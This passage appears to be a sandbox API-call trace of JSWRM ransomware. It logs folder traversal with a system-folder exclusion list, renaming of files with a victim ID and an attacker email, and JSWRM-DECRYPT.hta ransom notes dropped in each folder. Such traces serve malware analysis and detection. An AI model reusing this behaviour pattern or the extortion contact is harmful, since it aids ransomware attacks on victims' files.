lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0067.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0067.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0067.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0067.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0067.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0067.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0067.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0067.973] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.973] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10091077203908560) returned 0 [0067.973] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0067.973] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0067.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0067.974] CloseHandle (hObject=0xffffffff) returned 1 [0067.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0067.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0067.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0067.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0067.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0067.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0067.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.974] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\tipresx.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\tipresx.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\tipresx.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0067.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0067.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0067.974] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e100c60, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e100c60, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e100c60, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0067.974] FindClose (in: hFindFile=0x231dc0 | out: hFindFile=0x231dc0) returned 1 [0067.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0067.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0067.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0067.975] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0637839, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a354279, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="fsdefinitions", cAlternateFileName="FSDEFI~1")) returned 1 [0067.975] lstrcmpiW (lpString1="fsdefinitions", lpString2=".") returned 1 [0067.975] lstrcmpiW (lpString1="fsdefinitions", lpString2="..") returned 1 [0067.975] lstrcmpiW (lpString1="fsdefinitions", lpString2="...") returned 1 [0067.975] lstrcmpiW (lpString1="fsdefinitions", lpString2="windows") returned -1 [0067.975] lstrcmpiW (lpString1="fsdefinitions", lpString2="recovery") returned -1 [0067.975] lstrcmpiW (lpString1="fsdefinitions", lpString2="perflogs") returned -1 [0067.975] lstrcmpiW (lpString1="fsdefinitions", lpString2="documents and settings") returned 1 [0067.975] lstrcmpiW (lpString1="fsdefinitions", lpString2="$RECYCLE.BIN") returned 1 [0067.975] lstrcmpiW (lpString1="fsdefinitions", lpString2="system volume information") returned -1 [0067.975] lstrcmpiW (lpString1="fsdefinitions", lpString2="msocache") returned -1 [0067.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0067.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0067.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0067.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0067.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0067.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0067.975] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\jswrm-decrypt.hta")) returned 0xffffffff [0067.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0067.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0067.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0067.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0067.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0067.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0067.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0067.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0067.977] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0068.003] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.003] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0068.004] CloseHandle (hObject=0x454) returned 1 [0068.005] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.005] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0068.005] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0068.005] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0068.005] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0068.005] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0068.005] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1fc808 [0068.005] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x21fab8 [0068.005] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.005] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\jswrm-decrypt.hta")) returned 0x20 [0068.005] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21fab8 | out: hHeap=0x1e0000) returned 1 [0068.005] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0068.005] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0068.028] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0637839, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f30d53a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x232100 [0068.028] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.028] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0637839, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f30d53a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.028] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.028] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.028] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0638633, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a354279, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="auxpad", cAlternateFileName="")) returned 1 [0068.028] lstrcmpiW (lpString1="auxpad", lpString2=".") returned 1 [0068.028] lstrcmpiW (lpString1="auxpad", lpString2="..") returned 1 [0068.028] lstrcmpiW (lpString1="auxpad", lpString2="...") returned 1 [0068.028] lstrcmpiW (lpString1="auxpad", lpString2="windows") returned -1 [0068.028] lstrcmpiW (lpString1="auxpad", lpString2="recovery") returned -1 [0068.028] lstrcmpiW (lpString1="auxpad", lpString2="perflogs") returned -1 [0068.028] lstrcmpiW (lpString1="auxpad", lpString2="documents and settings") returned -1 [0068.028] lstrcmpiW (lpString1="auxpad", lpString2="$RECYCLE.BIN") returned 1 [0068.028] lstrcmpiW (lpString1="auxpad", lpString2="system volume information") returned -1 [0068.028] lstrcmpiW (lpString1="auxpad", lpString2="msocache") returned -1 [0068.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1fc808 [0068.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x21fab8 [0068.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0068.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0068.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0068.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0068.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0068.029] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\jswrm-decrypt.hta")) returned 0xffffffff [0068.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0068.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0068.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1e0 [0068.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0068.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffb0 [0068.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0068.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0068.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0068.029] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0068.029] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.029] WriteFile (in: hFile=0x458, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0068.030] CloseHandle (hObject=0x458) returned 1 [0068.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0068.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffb0 | out: hHeap=0x1e0000) returned 1 [0068.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0068.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0068.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0068.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0068.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0068.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0068.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0068.031] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\jswrm-decrypt.hta")) returned 0x20 [0068.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0068.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0068.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0068.031] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0638633, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f359946, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x24976a, cFileName=".", cAlternateFileName="")) returned 0x231ec0 [0068.031] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.032] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0638633, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f359946, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x24976a, cFileName="..", cAlternateFileName="")) returned 1 [0068.032] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.032] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.032] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x59a, dwReserved0=0x60002, dwReserved1=0x24976a, cFileName="auxbase.xml", cAlternateFileName="")) returned 1 [0068.032] lstrcmpiW (lpString1="auxbase.xml", lpString2=".") returned 1 [0068.032] lstrcmpiW (lpString1="auxbase.xml", lpString2="..") returned 1 [0068.032] lstrcmpiW (lpString1="auxbase.xml", lpString2="...") returned 1 [0068.032] lstrcmpiW (lpString1="auxbase.xml", lpString2="windows") returned -1 [0068.032] lstrcmpiW (lpString1="auxbase.xml", lpString2="recovery") returned -1 [0068.032] lstrcmpiW (lpString1="auxbase.xml", lpString2="perflogs") returned -1 [0068.032] lstrcmpiW (lpString1="auxbase.xml", lpString2="documents and settings") returned -1 [0068.032] lstrcmpiW (lpString1="auxbase.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.032] lstrcmpiW (lpString1="auxbase.xml", lpString2="system volume information") returned -1 [0068.032] lstrcmpiW (lpString1="auxbase.xml", lpString2="msocache") returned -1 [0068.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="auxbase.xml", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0068.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="auxbase.xml", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="auxbase.xml", lpUsedDefaultChar=0x0) returned 11 [0068.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0068.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="auxbase.xml", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0068.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="auxbase.xml", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="auxbase.xml", lpUsedDefaultChar=0x0) returned 11 [0068.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0068.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0068.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0068.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0068.032] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.033] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=9965183122497008) returned 0 [0068.033] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) 